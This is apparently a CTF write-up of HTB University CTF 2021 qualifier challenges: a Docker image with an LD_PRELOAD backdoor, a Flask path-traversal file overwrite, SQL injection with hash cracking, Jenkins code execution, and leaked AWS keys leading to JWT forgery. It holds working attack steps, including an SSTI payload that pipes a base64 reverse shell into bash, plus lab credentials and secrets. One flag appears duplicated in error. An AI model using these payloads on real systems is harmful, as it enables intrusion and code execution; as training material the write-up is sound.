HTB University CTF 2021 - Quals
Peel back the layers
Category
Forensics
Challenge
An unknown maintainer managed to push an update to one of our public docker images. Our SOC team reported suspicious traffic coming from some of our steam factories ever since. The update got retracted making us unable to investigate further. We are concerned that this might refer to a supply-chain attack. Could you investigate?
Docker Image: steammaintainer/gearrepairimage
Solution
- pull the docker image
$ docker pull - view the image layers
$ docker history steammaintainer/gearrepairimage --no-trunc - notice that the environment variable LD_PRELOAD was modified
ENV LD_PRELOAD=/usr/share/lib/librs.so - to extract and view this file, dump the layers as
tar$ docker save steammaintainer/gearrepairimage -o layers.tar - run
stringson the shared library file to get the flag$ strings 0aec9568b70f59cc149be9de4d303bc0caf0ed940cd5266671300b2d01e47922/usr/share/lib/librs.so ... libc.so.6 GLIBC_2.2.5 u/UH HTB{1_r3H 4lly_l1kH 3_st34mpH unk_r0b0H ts!!!} REMOTE_ADDR REMOTE_PORT /bin/sh ...
Flag
HTB{1_r34lly_l1k3_st34mpunk_r0b0ts!!!}
Slippy
Category
Web
Challenge
You’ve found a portal for a firmware upgrade service, responsible for the deployment and maintenance of rogue androids hunting humans outside the tractor city. The question is… what are you going to do about it?
Challenge source code was given.
Solution
- upon reviewing the source code, a utility function blindly saves files based on the
filenamein the requesttmp = tempfile.gettempdir() path = os.path.join(tmp, file.filename) file.save(path) - the
Flask Appwas also running indebug mode - leveraging the above two vulnerabilities, it is possible to overwrite the source code of the application and the application reloads with the new source code
- update
util.pyto return the flag and upload it with the rightfilenamein therequest formfilename=../../../../../../../../app/application/util.py
Flag
HTB{1_r34lly_l1k3_st34mpunk_r0b0ts!!!}
GoodGames (user)
Category
Fullpwn
Challenge
An IP address was given.
Solution
- running an
nmapscan on the given IP showed port80openPORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.48 |_http-title: GoodGames | Community and Store |_http-server-header: Werkzeug/2.0.2 Python/3.9.2 - the only interesting functionality in the web application is login
- running
SQLMapon the login request reveals that theemailparameter is vulnerable to injection - dump the database using
SQLMapDatabase: main Table: user [1 entry] +----+-------+---------------------+----------------------------------+ | id | name | email | password | +----+-------+---------------------+----------------------------------+ | 1 | admin | admin@goodgames.htb | 2b22337f218b2d82dfc3b6f77e7cb8ec | +----+-------+---------------------+----------------------------------+ - crack the password hash using hashcat
$ hashcat --show -m 0 hash.txt /usr/share/wordlists/rockyou.txt 2b22337f218b2d82dfc3b6f77e7cb8ec:superadministrator - logging in as admin and navigating the website reveals a new subdomain -
http://internal-administration.goodgames.htb/ - login with the same credentials in the internal administration website
- the only functionality in this website allows changing the admin’s name
- testing for various vulnerabilities in this input field finally leads to
Server-side Template Injection (SSTI)
{{7*'7'}}
- exploit the command execution vulnerability to get a reverse shell and read the flag
{{config.__class__.__init__.__globals__['os'].popen('echo <rev-shell-base64> | base64 -d | bash').read()}}
Flag
HTB{7h4T_w45_Tr1cKy_1_D4r3_54y}
Object (user)
Category
Fullpwn
Challenge
An IP address was given.
Solution
- running an
nmapscan on the given IP address showed Jenkins running on port8080 - register an account on Jenkins and create a pipeline to get code execution on the Windows machine
- read the
user.txttype C:\Users\oliver\Desktop\user.txt - view the output in
Console Outputtab in Jenkins
Flag
HTB{c1_cd_c00k3d_up_1337!}
Epsilon
Category
Cloud
Challenge
An IP address was given.
Solution
- running an
nmapscan on the given IP showed port22,80and5000openPORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA) | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) 80/tcp open http Apache httpd 2.4.41 | http-git: | 10.129.96.99:80/.git/ | Git repository found! | Repository description: Unnamed repository; edit this file 'description' to name the... |_ Last commit message: Updating Tracking API # Please enter the commit message for... |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: 403 Forbidden 5000/tcp open http Werkzeug httpd 2.0.2 (Python 3.8.10) |_http-server-header: Werkzeug/2.0.2 Python/3.8.10 |_http-title: Costume Shop .gitis available in the website running on port80- use GitTools to find the
AWS Keysandserver.pyin one of the commits... aws_access_key_id='AQLA5M37BDN6FJP76TDC', aws_secret_access_key='OsK0o/glWwcjk2U3vVEowkvq5t4EiIreB+WdFo1A', region_name='us-east-1', endpoint_url='http://cloud.epsilon.htb') ...
- use GitTools to find the
server.pycontains the code running in port5000and requires thesecretto impersonateadmin JWT- use the above AWS Keys to get the lambda code, which contains the
secret// commands $ aws --endpoint-url=http://cloud.epsilon.htb/ lambda list-functions $ aws --endpoint-url=http://cloud.epsilon.htb/ lambda get-function --function-name costume_shop_v1 $ wget "http://cloud.epsilon.htb/2015-03-31/functions/costume_shop_v1/code" -O code.zip // content of lambda_function.py ... secret='RrXCv`mrNe!K!4+5`wYq' ... - use the
secretto impersonateJWTas admin and login as admin - from
server.py, it is seen thatorder()function contains dangerous functionstmpl=render_template_string(message,costume=costume) - exploit
SSTIin the above to get a reverse shell and read the flag
{{config.__class__.__init__.__globals__['os'].popen('echo <rev-shell-base64> | base64 -d | bash').read()}}
Flag
HTB{l4mbd4_l34ks_4r3_fun!!!}